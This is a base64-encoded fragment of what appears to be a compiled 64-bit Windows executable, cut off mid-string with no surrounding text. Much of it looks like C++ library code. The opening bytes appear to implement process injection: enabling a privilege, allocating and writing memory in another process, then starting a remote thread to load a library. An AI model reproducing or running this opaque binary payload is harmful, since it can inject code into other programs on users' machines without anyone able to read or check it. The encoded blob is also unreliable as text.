wMAM8n/FXSvAgCFwHUW/xWCrwIAi9BIjQ1JmgMA6Kzw///rbcdEJFABAAAASItEJGBIiUQkVMdEJFwCAAAASIlsJChIiWwkIEG5EAAAAEyNRCRQM9JIi8//FRCvAgCFwHUW/xUurwIAi9BIjQ0dmgMA6Fjw///rGf8VGK8CAD0UBQAAdQxIjQ0qmgMA6D3w///HRCQgBAAAADPSQbkAMAAAQbgEAQAASIvL/xU2rwIASIv4SIXAD4QZAQAASItOEEiJTCQgTI0NipoDAEyNBaOaAwC6BAEAAEiNTCRw6Ezw//9IjUQkcEnHwf////9J/8FCOCwIdfdJ/8FIiWwkIEyNRCRwSIvXSIvL/xXergIAhcAPhL0AAABIjQ2HmgMA/xWRrgIASIvISI0Vb5oDAP8Vca4CAEiFwA+EoAAAAEiJbCQwiWwkKEiJfCQgTIvIRTPAM9JIi8v/FWGuAgBIhcB0c7r/////SIvI/xVmrgIAQbkAgAAARTPASIvXSIvL/xVBrgIASIvL/xUQrgIASItMJEhIhcl0Bv8VAK4CAEiLTCRASIXJdAb/FfCtAgC5uAsAAP8V1a0CAEiNDQaaAwDoIesAAEiNDRqaAwDoFesAADPA6w5Ii8v/FcCtAgC4AQAAAEiLjCSAAQAASDPM6AtfAABMjZwkkAEAAEmLWxBJi2sgSYtzKEmL41/DzMxIiVwkGEiJdCQgV0FUQVVBVkFXSIHssAAAAEiLBVftAwBIM8RIiYQkqAAAAIlUJDRIi9lIiUwkODP/i/eJfCQwSIlMJFBIiwFIY0gESItMGUhIhcl0B0iLAf9QCJBIiwtIY0EEg3wYEAB0BDLA6ypIi0QYUEiFwHQeSDvDdBlIi8joGiIAAEiLC0hjQQSDfBgQAA+UwOsCsAGIRCRYhMAPhLMBAABIY0EESItEGEBMi3AITIl0JEhJiwZJi87/UAiQM9JIjYwkpAAAAOjQNgAAkEyLLVAWBABMiawkkAAAAEyLPVEWBABNhf91QzPSSI2MJKAAAADopTYAAEw5PTYWBAB1F4sF5gAEAP/AiQXeAAQASJhIiQUdFgQASI2MJKAAAADo8DYAAEyLPQkWBABOjST9AAAAAE07fhhzDUmLRhBJizwESIX/dW1BgH4kAHQT6N5RAABMO3gYcw1Ii0AQSYs8BEiF/3VOTYXtdAVJi/3rREiNVCRASI2MJJAAAADouzEAAEiD+P8PhEoBAABIi7wkkAAAAEiJvCSQAAAASIvP6FVRAABIiwdIi8//UAhIiT1xFQQASI2MJKQAAADoVDYAAJBJiwZJi87/UBBIi8hIhcB0C0iLALoBAAAA/xCQSIsDTGNIBEwDy0mLQUjGhCSQAAAAAEiJhCSYAAAAQQ+2QVgPKIQkkAAAAGYPf0QkQEyLF4tMJDSJTCQoiEQkIEyNRCRASI2UJJAAAABIi89B/1JAugQAAACAvCSQAAAAAA9F8ol0JDAz/+sQM/+LdCQwSItcJDi6BAAAAEiLA0hjSARIA8sLcRBIg3lIAA9F1wvWg+IXiVEQI1EUdWDoiFMAAITAdQlIi8vocCEAAJBIiwtIY1EESItMGkhIhcl0B0iLEf9SEJBIi8NIi4wkqAAAAEgzzOg0XAAATI2cJLAAAABJi1tASYtzSEmL40FfQV5BXUFcX8PogvP//5D2wgR0CUiNHSWVAwDrFfbCAkiNHTGVAwBIjQVClQMASA9E2LoBAAAASI1MJEDo3+7//0yLwEiL00iNTCRg6F/4//9IjRXA1gMASI1MJGDoYnkAAMzMzMzMzMzMzMzMzMzMQFNIg+wgSIvZSIsJSIXJdAXo8ugAAEjHAwAAAABIg8QgW8PMzMzMzMzMzMzMzMzMQFNIg+wgSItRGEiL2UiD+hByLEiLCUj/wkiB+gAQAAByGEyLQfhIg8InSSvISI1B+EiD+B93IUmLyOhhWwAASMdDEAAAAABIx0MYDwAAAMYDAEiDxCBbw+g39gAAzMzMQFNWV0iB7KAAAABIiwWW6QMASDPESImEJJAAAABBDxAASYv5TI0F/ZUDAEyLjCToAAAASIvySIvZDylEJEC6QAAAAEiNTCRQ6APr//9IY8hMjUQkQEiJTCQwSI1EJFAPtowk4AAAAEyLz0iJRCQoSIvWiEwkIEiLy+jiEAAASIvGSIuMJJAAAABIM8zoj1oAAEiBxKAAAABfXlvDzMzMzEiJXCQIVVZXQVRBVUFWQVdIjWwk6UiB7KAAAAAPKbQkkAAAAEiLBd3oAwBIM8RIiUX3TYvxTYvoTIv6TIvhM9JIiVXHSIlV10G5DwAAAEyJTd+IVcdBi0YYJQAwAADyDxB1fz0AMAAAdQlIjXL/jVoN63dJi3YgSIX2fgSLzusUdQ2FwHUFjVgB61+LyusFuQYAAABIY9k9ACAAAHVMDyjGD1QFOJUDAGYPLwUglQMAdjhIjVXnDyjG6KrxAACLReeZM8IrwmnIl3UAALiJtfgU9+nB+g2LwsHoHwPCSJhIA9hMi03fSItV10iNSzJIO8p3F0iJTddIjUXHSYP5EEgPQ0XHxgQIAOtPSIv5SCv6SYvBSCvCSDv4dydIiU3XSI1dx0mD+RBID0Ndx0gD2kyLxzPSSIvL6HR+AADGBDsA6xfGRCQgAEyLz0UzwEiL10iNTcfodykAAEWLRhjGRe8lQQ+64AUPtkXwuisAAAAPQsKIRfBIjVXwSI1F8UgPQtBB9sAQdAbGAiNI/8JmxwIuKsZCAkxBi8iB4QAwAABB9sAEdCOB+QAgAAB1BLBm60SB+QAwAAB1BLBB6zi4RwAAAESNQP7rI4H5ACAAAHUEsGbrIYH5ADAAAHUEsGHrFbhnAAAAQbhlAAAAgfkAEAAAQQ9EwIhCA8ZCBABIjU3HSIN93xBID0NNx/IPEXQkIESLzkyNRe9Ii1XX6JDo//9IY8hBDxBFAA8pRbdIjUXHSIN93xBID0NFx0iJTCQwSIlEJCgPtkV3iEQkIE2LzkyNRbdJi9dJi8zowhQAAJBIi1XfSIP6EHItSP/CSItNx0iLwUiB+gAQAAByFUiDwidIi0n4SCvBSIPA+EiD+B93N+gKWAAASYvHSItN90gzzOjbVwAASIucJOAAAAAPKLQkkAAAAEiBxKAAAABBX0FeQV1BXF9eXcPox/IAAMzMzEiJXCQIVVZXQVRBVUFWQVdIjWwk6UiB7KAAAAAPKbQkkAAAAEiLBQ3mAwBIM8RIiUX3TYvxTYvoTIv6TIvhM9JIiVXHSIlV10G5DwAAAEyJTd+IVcdBi0YYJQAwAADyDxB1fz0AMAAAdQlIjXL/jVoN63dJi3YgSIX2fgSLzusUdQ2FwHUFjVgB61+LyusFuQYAAABIY9k9ACAAAHVMDyjGD1QFaJIDAGYPLwVQkgMAdjhIjVXnDyjG6NruAACLReeZM8IrwmnIl3UAALiJtfgU9+nB+g2LwsHoHwPCSJhIA9hMi03fSItV10iNSzJIO8p3F0iJTddIjUXHSYP5EEgPQ0XHxgQIAOtPSIv5SCv6SYvBSCvCSDv4dydIiU3XSI1dx0mD+RBID0Ndx0gD2kyLxzPSSIvL6KR7AADGBDsA6xfGRCQgAEyLz0UzwEiL10iNTcfopyYAAEWLRhjGRe8lQQ+64AUPtkXwuisAAAAPQsKIRfBIjVXwSI1F8UgPQtBB9sAQdAbGAiNI/8JmxwIuKkGLyIHhADAAAEH2wAR0I4H5ACAAAHUEsGbrRIH5ADAAAHUEsEHrOLhHAAAARI1A/usjgfkAIAAAdQSwZushgfkAMAAAdQSwYesVuGcAAABBuGUAAACB+QAQAABBD0TAiEICxkIDAEiNTcdIg33fEEgPQ03H8g8RdCQgRIvOTI1F70iLVdfoxOX//0hjyEEPEEUADylFt0iNRcdIg33fEEgPQ0XHSIlMJDBIiUQkKA+2RXeIRCQgTYvOTI1Ft0mL10mLzOj2EQAAkEiLVd9Ig/oQci1I/8JIi03HSIvBSIH6ABAAAHIVSIPCJ0iLSfhIK8FIg8D4SIP4H3c36D5VAABJi8dIi033SDPM6A9VAABIi5wk4AAAAA8otCSQAAAASIHEoAAAAEFfQV5BXUFcX15dw+j77wAAzMzMzMzMzEBTVldIgeywAAAASIsFVuMDAEgzxEiJhCSgAAAAD7ZEJFFIi/FBDxAARYtBGLkrAAAAQQ+64AXGRCRQJUmL+Q8pRCRAD0LBSIvaiEQkUUiNTCRSSI1EJFFID0LBQfbACHQGxgAjSP/AQYvIZscASTaB4QAOAADGQAI0gfkABAAAdQVBsG/rHIH5AAgAAHQFQbB16w9BwOADQfbQQYDgIEGAyFhMi4wk+AAAAEiNTCRgRIhAA7pAAAAATI1EJFDGQAQA6Enk//9IY8hMjUQkQEiJTCQwSI1EJGAPtowk8AAAAEyLz0iJRCQoSIvTiEwkIEiLzugoCgAASIvDSIuMJKAAAABIM8zo1VMAAEiBxLAAAABfXlvDzMzMzMzMzMzMzEBTVldIgeywAAAASIsFNuIDAEgzxEiJhCSgAAAAD7ZEJFFIi/FBDxAARYtBGLkrAAAAQQ+64AXGRCRQJUmL+Q8pRCRAD0LBSIvaiEQkUUiNTCRSSI1EJFFID0LBQfbACHQGxgAjSP/AQYvIZscASTaB4QAOAADGQAI0gfkABAAAdQVBsG/rHIH5AAgAAHQFQbBk6w9BwOADQfbQQYDgIEGAyFhMi4wk+AAAAEiNTCRgRIhAA7pAAAAATI1EJFDGQAQA6Cnj//9IY8hMjUQkQEiJTCQwSI1EJGAPtowk8AAAAEyLz0iJRCQoSIvTiEwkIEiLzugICQAASIvDSIuMJKAAAABIM8zotVIAAEiBxLAAAABfXlvDzMzMzMzMzMzMzEBTVldIgeywAAAASIsFFuEDAEgzxEiJhCSgAAAAD7ZEJFFIi/FBDxAARYtBGLkrAAAAQQ+64AXGRCRQJUmL+Q8pRCRAD0LBSIvaiEQkUUiNTCRSSI1EJFFID0LBQfbACHQGxgAjSP/AQYvIxgBsgeEADgAAgfkABAAAdQVBsG/rHIH5AAgAAHQFQbB16w9BwOADQfbQQYDgIEGAyFhEi4wk+AAAAEiNTCRgRIhAAbpAAAAATI1EJFDGQAIA6A/i//9IY8hMjUQkQEiJTCQwSI1EJGAPtowk8AAAAEyLz0iJRCQoSIvTiEwkIEiLzujuBwAASIvDSIuMJKAAAABIM8zom1EAAEiBxLAAAABfXlvDQFNWV0iB7LAAAABIiwUG4AMASDPESImEJKAAAAAPtkQkUUiL8UEPEABFi0EYuSsAAABBD7rgBcZEJFAlSYv5DylEJEAPQsFIi9qIRCRRSI1MJFJIjUQkUUgPQsFB9sAIdAbGACNI/8BBi8jGAGyB4QAOAACB+QAEAAB1BUGwb+scgfkACAAAdAVBsGTrD0HA4ANB9tBBgOAgQYDIWESLjCT4AAAASI1MJGBEiEABukAAAABMjUQkUMZAAgDo/+D//0hjyEyNRCRASIlMJDBIjUQkYA+2jCTwAAAATIvPSIlEJChIi9OITCQgSIvO6N4GAABIi8NIi4wkoAAAAEgzzOiLUAAASIHEsAAAAF9eW8NAVVNWV0FUQVVBVkFXSI1sJPFIgeyYAAAASIsF6N4DAEgzxEiJRfdNi+lJi/BIi9pIiVXPRA+2fXdFM+RB90EYAEAAAHUoQQ8QAA8pRadMixEPtlV/iVQkKESIfCQgTI1Fp0iL00H/UkjpMwIAAEmLQUBIi0gISIlNr0iLAf9QCJBIjU2n6LYbAABIi9hIi02vSIXJdBlIixH/UhBIhcB0DkyLALoBAAAASIvIQf8QTIll10yJZedIx0XvDwAAAMZF1wBIiwNIjVWnSIvLgH1/AHQF/1A46wP/UDAPEE23DxBFpw8RTecPEUXXSYt9KEyLdedIhf9+Ckk7/nYFSSv+6wNJi/xBi0UYJcABAACD+EB0aA8QBg8pRadIhf90VkiLXa9Ihdt0P0iLQ0BIgzgAdCRIi0tYiwGFwH4a/8iJAUiLS0BIixFIjUIBSIkBRIg6QYvH6wxBi9dIiwNIi8v/UBiD+P91BMZFpwFIg+8BdbIPKEWnDxEGSYv8DxAGDylFp0iNdddMi2XXSIN97xBJD0P0TYX2dGFIi12vDx9AAEQPtgZIhdt0P0iLQ0BIgzgAdCRIi0tYiwGFwH4a/8iJAUiLS0BIixFIjUIBSIkBRIgCQYvA6wxBi9BIiwNIi8v/UBiD+P91BMZFpwFI/8ZJg+4BdasPKEWnScdFKAAAAAAPKUWnSIX/dFhIi12vZpBIhdt0P0iLQ0BIgzgAdCRIi0tYiwGFwH4a/8iJAUiLS0BIixFIjUIBSIkBRIg6QYvH6wxBi9dIiwNIi8v/UBiD+P91BMZFpwFIg+8BdbIPKEWnSItdzw8RA0iLRe9Ig/gQci5IjVABSYvESIH6ABAAAHIWSIPCJ02LZCT4SSvESIPA+EiD+B93K0mLzOj/TQAASIvDSItN90gzzOjQTQAASIHEmAAAAEFfQV5BXUFcX15bXcPoy+gAAMzMzMzMzMxAU0iD7CBIi9novkQAAITAdQlIiwvophIAAJBIixNIiwJIY0gESItMEUhIhcl0B0iLAf9QEJBIg8QgW8PMzMzMSIlcJBBIiUwkCFdIg+wgSIvaSIv5SIkRSIsCTGNABEmLTBBISIXJdAdIiwH/UAiQSIsDSGNIBIN8GRAAdAQywOsnSItMGVBIhcl0G0g7y3QW6MoQAABIiwNIY0gEg3wZEAAPlMDrArABiEcISIvHSItcJDhIg8QgX8PMzMzMzMxAU1VXQVZBV0iD7CBIi2kYTYvwTIv6SIvZTDvFdyxIi/lIg/0QcgNIizlMiXEQSIvP6DprAABIi8NBxgQ+AEiDxCBBX0FeX11bw0i//////////39MO/cPh/kAAABJi85Ig8kPSDvPdx9Ii9VIi8dI0epIK8JIO+h3DkiNBCpIi/lIO8hID0L4SIvPSIl0JGhIg8EBSMfA/////0gPQshIgfkAEAAAcixIjUEnSDvBD4aVAAAASIvI6FtMAABIhcAPhIoAAABIjXAnSIPm4EiJRvjrEUiFyXQK6DpMAABIi/DrAjP2TYvGTIlzEEmL10iJexhIi87odWoAAEHGBDYASIP9EHItSIsLSI1VAUiB+gAQAAByGEyLQfhIg8InSSvISI1B+EiD+B93JUmLyOjdSwAASIkzSIvDSIt0JGhIg8QgQV9BXl9dW8PoMd3//8zor+YAAMzoxd3//8zMzMzMSIl0JBBXSIPsMEiL+UmL8EiLSRBMi0cYSYvASCvBSDvwdz9IiVwkQEiNBDFIiUcQSIvHSYP4EHIDSIsHSI0cCEyLxkiLy+jFaQAAxgQzAEiLx0iLXCRASIt0JEhIg8QwX8NMi8pIiXQkIEiL1kUzwEiLz+gYGAAASIt0JEhIg8QwX8PMzMzMzMzMzMzMzMzMQFNIg+wgSI0Fs54CAEiL2UiJAfbCAXQKuhAAAADo/koAAEiLw0iDxCBbw8zMzMzMQFNIg+wwSIvaM8BIi1EoScfA/////0iJA0iJQxBIx0MYDwAAAIgDSf/AQjgEAnX3SIvL6Kj9//9Ii8NIg8QwW8PMzMzMzMzMzMzMzMzMzMxAU0iD7DBIi9ozwEiLUSBJx8D/////SIkDSIlDEEjHQxgPAAAAiANJ/8BCOAQCdfdIi8voWP3//0iLw0iDxDBbw8zMzMzMzMzMzMzMzMzMzEBTSIPsMEiL2jPASItREEnHwP////9IiQNIiUMQSMdDGA8AAACIA0n/wEI4BAJ190iLy+gI/f//SIvDSIPEMFvDzMzMzMzMzMzMzMzMzMzMD7ZBGcPMzMzMzMzMzMzMzA+2QRjDzMzMzMzMzMzMzMxIiVwkCFVWV0FUQVVBVkFXSI1sJPFIgeywAAAASIsFJdgDAEgzxEiJRf9Ni+FMiU2nTYv4TIlFn0iJVbdED7Z1b0iLXXdIi31/SIX/dBEPtgMsK6j9dQhBvQEAAADrA0Uz7UGLQRglAA4AAD0ACAAAdR5JjU0CSDvPdxVCgDwrMHUOQg+2RCsBLFio30wPROlJi0FASItICEiJTZdIiwH/UAiQSI1Nj+jEEAAASIvwSItNl0iFyXQYSIsB/1AQSIvISIXAdApIiwC6AQAAAP8QM8BIiUW/SIlFz0jHRdcPAAAAiEW/RTPASIvXSI1Nv+jsDgAAkEyNTb9Ig33XEEwPQ02/SIsGTI0EH0iL00iLzv9QOEmLRCRASItICEiJTZdIiwH/UAiQSI1Nj+hQFAAASIvYSItNl0iFyXQYSIsB/1AQSIvISIXAdApIiwC6AQAAAP8QSIsDSI1V30iLy/9QKJBIjXXfSIN99xBID0N13w+2Bv7IPH0Ph8AAAABIiwNIi8v/UCBED774D7YGPH8PhKQAAACEwA+OnAAAAEgPvshIi8dJK8VIO8gPg4kAAABIK/lMi0XPTDvHD4KRBAAASItN10iLwUkrwEiD+AFyMkmNQAFIiUXPSI1dv0iD+RBID0Ndv0gD30iNSwFMK8dJ/8BIi9PoRmYAAEEPtseIA+shRIh8JChIx0QkIAEAAABMi89FM8BBjVABSI1Nv+gtFgAASI1GAYA4AEgPT/APtgY8fw+FXP///0yLfZ9Mi2XPSItFp0iLeChIhf9+Ckk7/HYFSSv86wIz/4tAGCXAAQAAQQ8QBw8pRY+D+EAPhMMBAAA9AAEAAA+E2wAAAEiF/3RWSItdl0iF23Q/SItDQEiDOAB0JEiLS1iLAYXAfhr/yIkBSItLQEiLEUiNQgFIiQFEiDJBi8brDEGL1kiLA0iLy/9QGIP4/3UExkWPAUiD7wF1sg8oRY8z/w8pRY9IjXW/SIN91xBID0N1v02L/U2F7Q+EsAEAAEiLXZcPHwBED7YGSIXbdD5Ii0NASDk4dCRIi0tYiwGFwH4a/8iJAUiLS0BIixFIjUIBSIkBRIgCQYvA6wxBi9BIiwNIi8v/UBiD+P91BMZFjwFI/8ZJg+8BdazpTAEAAE2L/UiNdb9Ig33XEEgPQ3W/TYXtdF1Ii12XRA+2BkiF23Q/SItDQEiDOAB0JEiLS1iLAYXAfhr/yIkBSItLQEiLEUiNQgFIiQFEiAJBi8DrDEGL0EiLA0iLy/9QGIP4/3UExkWPAUj/xkmD7wF1qw8oRY8PKUWPSIX/dF1Ii12XDx+AAAAAAEiF23Q/SItDQEiDOAB0JEiLS1iLAYXAfhr/yIkBSItLQEiLEUiNQgFIiQFEiDJBi8brDEGL1kiLA0iLy/9QGIP4/3UExkWPAUiD7wF1sg8oRY8z/+tzSI11v0iDfdcQSA9Ddb9Ni/1Nhe10XUiLXZdED7YGSIXbdD9Ii0NASIM4AHQkSItLWIsBhcB+Gv/IiQFIi0tASIsRSI1CAUiJAUSIAkGLwOsMQYvQSIsDSIvL/1AYg/j/dQTGRY8BSP/GSYPvAXWrDyhFj0iLRZ8PEQAPKUWPSI11v0iDfdcQSA9Ddb9JA/VNK+V0X0iLXZdmkEQPtgZIhdt0P0iLQ0BIgzgAdCRIi0tYiwGFwH4a/8iJAUiLS0BIixFIjUIBSIkBRIgCQYvA6wxBi9BIiwNIi8v/UBiD+P91BMZFjwFI/8ZJg+wBdasPKEWPSItFp0jHQCgAAAAADylFj0iF/3RWSItdl0iF23Q/SItDQEiDOAB0JEiLS1iLAYXAfhr/yIkBSItLQEiLEUiNQgFIiQFEiDJBi8brDEGL1kiLA0iLy/9QGIP4/3UExkWPAUiD7wF1sg8oRY9Ii123DxEDSItV90iD+hByMUj/wkiLTd9Ii8FIgfoAEAAAchlIg8InSItJ+EgrwUiDwPhIg/gfD4eGAAAA6ApEAABIx0XvAAAAAEjHRfcPAAAAxkXfAEiLVddIg/oQci1I/8JIi02/SIvBSIH6ABAAAHIVSIPCJ0iLSfhIK8FIg8D4SIP4H3cv6L9DAABIi8NIi03/SDPM6JBDAABIi5wk8AAAAEiBxLAAAABBX0FeQV1BXF9eXcPohN4AAJDo+goAAJDoeN4AAMzMzMxIiVwkCFVWV0FUQVVBVkFXSI1sJPFIgeywAAAASIsFxdEDAEgzxEiJRf9Ni/lMiU2nTIlFn0iJVa9ED7Z1b0iLXXdIi3V/SIX2dBEPtgMsK6j9dQhBvQEAAADrA0Uz7UGLQRglADAAAD0AMAAAdAlIjRX2fQMA6yVIjRXxfQMASY1NAkg7zncVQoA8KzB1DkIPtkQrASxYqN9MD0TpSIvL6BupAABMi+C4LgAAAGaJRbfozs8AAEiLCA+2AYhFt0iNVbdIi8vo9agAAEiL+EmLR0BIi0gISIlNl0iLAf9QCJBIjU2P6CYKAABMi/hIi02XSIXJdBhIiwH/UBBIi8hIhcB0CkiLALoBAAAA/xAzwEiJRb9IiUXPSMdF1w8AAACIRb9FM8BIi9ZIjU2/6E4IAACQTI1Nv0iDfdcQTA9DTb9JiwdMjQQeSIvTSYvP/1A4SItNp0iLQUBIi0gISIlNl0iLAf9QCJBIjU2P6K8NAABIi9hIi02XSIXJdBhIiwH/UBBIi8hIhcB0CkiLALoBAAAA/xBIiwNIjVXfSIvL/1AokEiLA0iLy/9QIEQPvvhIO/50IEiLA0iLy/9QGA+2yEiNRb9Ig33XEEgPQ0W/iAw4SDv+SQ9E/EiNdd9Ig333EEgPQ3XfD7YGPH8PhKQAAACEwA+OnAAAAEgPvshIi8dJK8VIO8gPg4kAAABIK/lMi0XPTDvHD4K1BAAASItN10iLwUkrwEiD+AFyMkmNQAFIiUXPSI1dv0iD+RBID0Ndv0gD30iNSwFMK8dJ/8BIi9PoiV8AAEEPtseIA+shRIh8JChIx0QkIAEAAABMi89FM8BBjVABSI1Nv+hwDwAASI1GAYA4AEgPT/APtgY8fw+FXP///0yLZc9Ii0WnSIt4KEiF/34KSTv8dgVJK/zrAjP/i0AYJcABAACD+EAPhOABAAA9AAEAAEiLRZ8PEAAPKUWPD4TfAAAASIX/dFZIi12XSIXbdD9Ii0NASIM4AHQkSItLWIsBhcB+Gv/IiQFIi0tASIsRSI1CAUiJAUSIMkGLxusMQYvWSIsDSIvL/1AYg/j/dQTGRY8BSIPvAXWyDyhFjzP/DylFj0iNdb9Ig33XEEgPQ3W/TYv9TYXtD4TUAQAASItdlw8fgAAAAABED7YGSIXbdD5Ii0NASDk4dCRIi0tYiwGFwH4a/8iJAUiLS0BIixFIjUIBSIkBRIgCQYvA6wxBi9BIiwNIi8v/UBiD+P91BMZFjwFI/8ZJg+8BdazpbAEAAE2L/UiNdb9Ig33XEEgPQ3W/TYXtdF1Ii12XRA+2BkiF23Q/SItDQEiDOAB0JEiLS1iLAYXAfhr/yIkBSItLQEiLEUiNQgFIiQFEiAJBi8DrDEGL0EiLA0iLy/9QGIP4/3UExkWPAUj/xkmD7wF1qw8oRY8PKUWPSIX/dF1Ii12XDx+AAAAAAEiF23Q/SItDQEiDOAB0JEiLS1iLAYXAfhr/yIkBSItLQEiLEUiNQgFIiQFEiDJBi8brDEGL1kiLA0iLy/9QGIP4/3UExkWPAUiD7wF1sg8oRY9Ii32fDxEHM/9Ii0Wf6YwAAABIi3WfDxAGDylFj0iNdb9Ig33XEEgPQ3W/TYv9TYXtdGRIi12XDx+AAAAAAEQPtgZIhdt0P0iLQ0BIgzgAdCRIi0tYiwGFwH4a/8iJAUiLS0BIixFIjUIBSIkBRIgCQYvA6wxBi9BIiwNIi8v/UBiD+P91BMZFjwFI/8ZJg+8BdasPKEWPSItFnw8RAA8QAA8pRY9IjXW/SIN91xBID0N1v0kD9U0r5XRdSItdl0QPtgZIhdt0P0iLQ0BIgzgAdCRIi0tYiwGFwH4a/8iJAUiLS0BIixFIjUIBSIkBRIgCQYvA6wxBi9BIiwNIi8v/UBiD+P91BMZFjwFI/8ZJg+wBdasPKEWPSItNp0jHQSgAAAAADylFj0iF/3RWSItdl0iF23Q/SItDQEiDOAB0JEiLS1iLAYXAfhr/yIkBSItLQEiLEUiNQgFIiQFEiDJBi8brDEGL1kiLA0iLy/9QGIP4/3UExkWPAUiD7wF1sg8oRY9Ii12vDxEDSItV90iD+hByMUj/wkiLTd9Ii8FIgfoAEAAAchlIg8InSItJ+EgrwUiDwPhIg/gfD4eGAAAA6Ck9AABIx0XvAAAAAEjHRfcPAAAAxkXfAEiLVddIg/oQci1I/8JIi02/SIvBSIH6ABAAAHIVSIPCJ0iLSfhIK8FIg8D4SIP4H3cv6N48AABIi8NIi03/SDPM6K88AABIi5wk8AAAAEiBxLAAAABBX0FeQV1BXF9eXcPoo9cAAJDoGQQAAJDol9cAAMzMzEiD7ChIixFIiwJIY0gESItMEUhIhcl0B0iLAf9QEJBIg8Qow8zMzMzMzMzMzMzMzEiJXCQQSIl0JBhXSIHsgAAAAEiLBb/KAwBIM8RIiUQkcEiL2UiJTCQoSIsBSGNIBEiLdBlISIX2D4SeAAAASIvTSI1MJGDole7//5CAfCRoAHRYM/+JfCQgSIsGSIvO/1BoRIvHugQAAACD+P9ED0TCRIlEJCDrDzP/jVcERItEJCBIi1wkKEiLA0hjSARIA8tEC0EQSIN5SAAPRddBC9CD4heJURAjURR1Vui8MgAAhMB1C0iLTCRg6KIAAACQTItEJGBJiwhIY1EESotMAkhIhcl0B0iLEf9SEJBIi8NIi0wkcEgzzOhkOwAATI2cJIAAAABJi1sYSYtzIEmL41/D9sIEdAlIjR1jdAMA6xX2wgJIjR1vdAMASI0FgHQDAEgPRNi6AQAAAEiNTCQo6B3O//9Mi8BIi9NIjUwkOOid1///SI0V/rUDAEiNTCQ46KBYAADMzMzMzMzMzMzMzMxAU0iD7GBIi9lIiwFIY1AEg3wKEAB1MvZEChgCdCtIi0wKSEiLAf9QaIP4/3UbSIsDSGNIBItEGRCD4BODyASJRBkQI0QZFHUGSIPEYFvDqAR0CUiNHbZzAwDrFKgCSI0dw3MDAEiNBdRzAwBID0TYugEAAABIjUwkIOhxzf//TIvASIvTSI1MJDDo8db//0iNFVK1AwBIjUwkMOj0VwAAzMzMzMzMzMzMzMzMzMzMzEiJXCQIV0iD7CBIjQXPngIASIv5SIkBi9pIi0kQ6HbHAABIi08g6G3HAABIi08o6GTHAABIjQXFjQIASIkH9sMBdA26MAAAAEiLz+gQOgAASItcJDBIi8dIg8QgX8PMzEBTVVdBVkFXSIPsIEiLaRhMi/JFD774SIvZSDvVdzJIi/lIg/0QcgNIizlMiXEQQYvXSIvPTYvG6NNeAABIi8NBxgQ+AEiDxCBBX0FeX11bw0i//////////39MO/cPh/kAAABJi85Ig8kPSDvPdx9Ii9VIi8dI0epIK8JIO+h3DkiNBCpIi/lIO8hID0L4SIvPSIl0JGhIg8EBSMfA/////0gPQshIgfkAEAAAcixIjUEnSDvBD4aVAAAASIvI6EQ5AABIhcAPhIoAAABIjXAnSIPm4EiJRvjrEUiFyXQK6CM5AABIi/DrAjP2QYvXTIlzEE2LxkiJexhIi87oDl4AAELGBDYASIP9EHItSIsLSI1VAUiB+gAQAAByGEyLQfhIg8InSSvISI1B+EiD+B93JUmLyOjGOAAASIkzSIvDSIt0JGhIg8QgQV9BXl9dW8PoGsr//8zomNMAAMzorsr//8zMzMzMzMzMzMzMzMzMSIPsKEiNDX1zAwDorBMAAMzMzMzMzMzMzMzMzMzMzMxIiVwkEEiJbCQYVldBVkiD7EBIiwW/xgMASDPESIlEJDBMi/Ez0kiNTCQk6NAQAACQSIstWPADAEiJbCQoSIs9JNsDAEiF/3U9M9JIjUwkIOirEAAASDk9DNsDAHUXiwXs2gMA/8CJBeTaAwBImEiJBfPaAwBIjUwkIOj5EAAASIs94toDAEmLTghIjTT9AAAAAEg7eRhzD0iLQRBIixwGSIXbdWHrAjPbgHkkAHQT6OArAABIO3gYcw1Ii0AQSIscBkiF23U/SIXtdAVIi93rNUmL1kiNTCQo6PLQ//9Ig/j/dE9Ii1wkKEiJXCQoSIvL6GYrAABIixNIi8v/UghIiR2K7wMASI1MJCToaBAAAEiLw0iLTCQwSDPM6DA3AABIi1wkaEiLbCRwSIPEQEFeX17D6IjO//+QzMzMzMzMzEiJXCQISIl0JBBIiXwkGEFUQVZBV0iB7IAAAABIjTXN2AMATIvmSIl0JEBFM/9Bi9+JXCQgSIsNtNgDAEhjUQRIi3wyKEiD/yJ8BkiDx9/rA0mL/0yL9kiJdCQoSItUMkhIhdJ0EEiLAkiLyv9QCEiLDXrYAwBIY0EEg3wwEAB0BDLA6y5Ii0QwUEiFwHQiSDvGdB1Ii8joJPr//0iLDU3YAwBIY0EEg3wwEAAPlMDrArABiEQkMEiL0YTAdQy6BAAAAIva6UMBAABIY0IEi0QwGCXAAQAAg/hAdHAPH0AASIX/fmdIY0EERA+2RDBYSItMMEhIi0FASIM4AHQkSItRWIsChcB+Gv/IiQJIi0lASIsRSI1CAUiJAUSIAkGLwOsJQYvQSIsB/1AYg/j/dRC6BAAAAIvaiVQkIOmYAAAASP/PSIsNptcDAOuUSGNBBEiLTDBISIsBQbghAAAASI0Vs28DAP9QSEiD+CF1XmaQSIX/fl5IiwV01wMASGNIBEQPtkQxWEiLTDFISItBQEiDOAB0JEiLUViLAoXAfhr/yIkCSItJQEiLEUiNQgFIiQFEiAJBi8DrCUGL0EiLAf9QGIP4/3QFSP/P66SDywSJXCQgugQAAABIiwUR1wMASGNIBEyJfDEo6xxIjTX/1gMARTP/QY1XBItcJCBMi3QkKEyLZCRASIsN49YDAEhjQQQLXDAQSIN8MEgAQQ9F1wvTg+IXiVQwEItMMBQjynVL6PcrAACEwHUJSYvO6N/5//+QSYsOSGNRBEqLTDJISIXJdAdIixH/UhCQSYvETI2cJIAAAABJi1sgSYtzKEmLezBJi+NBX0FeQVzD9sEEdAlIjR2pbQMA6xX2wQJIjR21bQMASI0Fxm0DAEgPRNi6AQAAAEiNTCRA6GPH//9Mi8BIi9NIjUwkUOjj0P//SI0VRK8DAEiNTCRQ6OZRAADMzEiJXCQQSIlsJBhWV0FWSIPsQEiLBa/CAwBIM8RIiUQkMEyL8TPSSI1MJCTowAwAAJBIiy047AMASIlsJChIiz1U7AMASIX/dT0z0kiNTCQg6JsMAABIOT087AMAdReLBdzWAwD/wIkF1NYDAEiYSIkFI+wDAEiNTCQg6OkMAABIiz0S7AMASYtOCEiNNP0AAAAASDt5GHMPSItBEEiLHAZIhdt1YesCM9uAeSQAdBPo0CcAAEg7eBhzDUiLQBBIixwGSIXbdT9Ihe10BUiL3es1SYvWSI1MJCjocgUAAEiD+P90T0iLXCQoSIlcJChIi8voVicAAEiLE0iLy/9SCEiJHWrrAwBIjUwkJOhYDAAASIvDSItMJDBIM8zoIDMAAEiLXCRoSItsJHBIg8RAQV5fXsPoeMr//5DMzMzMzMzMQFNWQVRBVUiD7D